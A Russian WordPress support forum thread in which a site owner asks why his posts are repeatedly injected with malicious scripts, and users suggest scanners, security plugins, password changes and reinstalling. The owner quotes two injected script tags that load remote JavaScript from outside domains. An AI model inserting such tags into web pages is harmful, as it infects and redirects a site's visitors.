Поддержка Проблемы и решения Заражают сайт вредоносным скриптом

  • Добрый день, я уже отписывался насчёт этой темы на форуме, мне подсказали сменить Шаблон сайта и будет всё хорошо. Я сменил шаблон, сайт продержался где-то неделю и снова накидали скриптов на каждую запись сайта.

    WP обновлял, в чем еще может быть проблема?
    Как защитить свой сайт, они мне каждую неделю уже около двух месяцев заливают новые скрипты!!!

    Сайт : http://topsensation.ru/

Просмотр 15 ответов — с 1 по 15 (всего 20)
  • Пароли я везде менял, неделю назат, в плагинах может быть вирус?

    Модератор Yuri

    (@yube)

    Дыра может быть где угодно. Могли взломать хостинг-систему, могли подложить бэкдор через дырявую Тему или плагин. И еще стопиццот разных вариантов.

    Попробуйте поискать заразу скриптом http://www.revisium.com/ai/

    я через БД удалил скрипты, но как обычно через неделю сново зальют

    wp-user.php Ну тот который был в записях сайта скрипт, я удалил. А вот где дырка, я незнаю!

    Может попробывать удалить из хостинга WP и закинуть чистый? Или когда обновляешь WP файлы меняются?

    и снова накидали скриптов на каждую запись сайта.

    Как проявляется заражение?

    Попробуйте использовать мощный, к тому же бесплатный, плагин в этой области http://wordpress.org/extend/plugins/wordfence/ Помимо того, что он обнаруживает (все)возможные заражения, он умеет автоматически восстанавливать файлы после заражения.

    Когда заходишь на сайт, антивирус пишет что сайт заражен! А если с мобильног оустройства заходишь, то пересылает на другой сайт!

    Хорошо попробую сейчас!

    Вот допустим скрипт которым заражали каждую запись сайта
    <script type=»text/javascript» src=»http://1iveinternet.ru/code.js»></script&gt;

    Когда заходишь на сайт антивирусник Avast пишет что посещение этой странице небезопасно и закрывал страницу!
    И писал найден вирус 1iveinternet.ru/code.js

    Можно попробовать разобраться, где имеется уязвимость или сделана закладка. Если желаете, можете сделать полный бекап файлов и выслать мне на почту в виде архива. Надеюсь, что объем не запредельный? 🙂 Если нет, то гадать я не готов..
    ЗЫ почта в профиле

    можете сделать полный бекап файлов и выслать мне на почту

    Шелл может быть не только в этих файлах. Нужно смотреть весь хостинг-акк ТСа.
    Бывает даже что при криво настроенных серваках хостера с одного акка заражают всех клиентов. Так что тут лечение возможно только на пациенте.

    Кроме того — обязательна смена доступов везде, где возможно. Ессно, с чистейшого ПК.

    Я неделю назат сменил виндовс, на хосте удалил всё, залил заново WP с офф сайта, сменил пароли, поставил новую тему с архива, удалил все плагины, ну теперь незнаю даже.

    Осталось подождать неделю и посмотреть зальют ли сново.

    Хост поддержка говорит мне что бы я отказывался от WP и переходил на другой движок.

    Хост поддержка говорит мне что бы я отказывался от WP и переходил на другой движок.

    С такими советами — менять хостера-советчика. Ибо ВП не ВООБЩЕ ни при причем. Так заражают ЛЮБОЙ сайт.. даже не сайт, а хостинг с поддержкой хтацесса и ПХП.
    А вот в заражении может быть виноват как хостер так и пользователь.

    Установка кривых\опасных\етс тем и плагов на ВП и несоблюдение правил безопасности — это абсолютная вина юзера (а не движка).

    Хост поддержка говорит мне что бы я отказывался от WP и переходил на другой движок.

    Чьорт, почему у меня ни одного сайта (все на WP) не взломали, даже обидно. Хотя пытались неоднократно и будут пытаться. Чистить и джумлу и WP приходилось. После экстренной чистки джумло-монстра пересадил сайт на WP — и все дела. И стоят после этого, не взламываются.
    Вывод: причина взлома, по большей части — беспечность владельца сайта.

    Модератор Yuri

    (@yube)

    Ну, мне один вордпресс дефейснули. А заодно и все остальные сайты, включая pure html, которые хостились на том же сервере. Надо отдать должное хостеру — за сутки поднял все бэкапы на другом тазике. А мог бы начать рассказывать про уязвимость html 😉

    Кто посоветует хостера?

    Хостер! Здесь могла быть ваша реклама!

    А ответы тех.поддержки, по крайней мере первый ответ, может быть «смешным», наверное, на любом хостинге. Предполагаю, что тикеты там разбирают «студенты-практиканты», и потом, если они не справляются, запрос идет дальше.

    Могу посоветовать плагин Login LockDown, если еще не поставили. Реально помогает от взлома логина. Боты постоянно приходят подбирать пароли.

    Мда на этот раз 3 дня всего лишь прошло и новый скрипт накидали
    <script type=»text/javascript» src=»http://newstops.ru/stats.js»></script&gt;

    Что посоветуете делать? Я уже на всё готов, что бы они от меня отстали!

Просмотр 15 ответов — с 1 по 15 (всего 20)
  • Тема «Заражают сайт вредоносным скриптом» закрыта для новых ответов.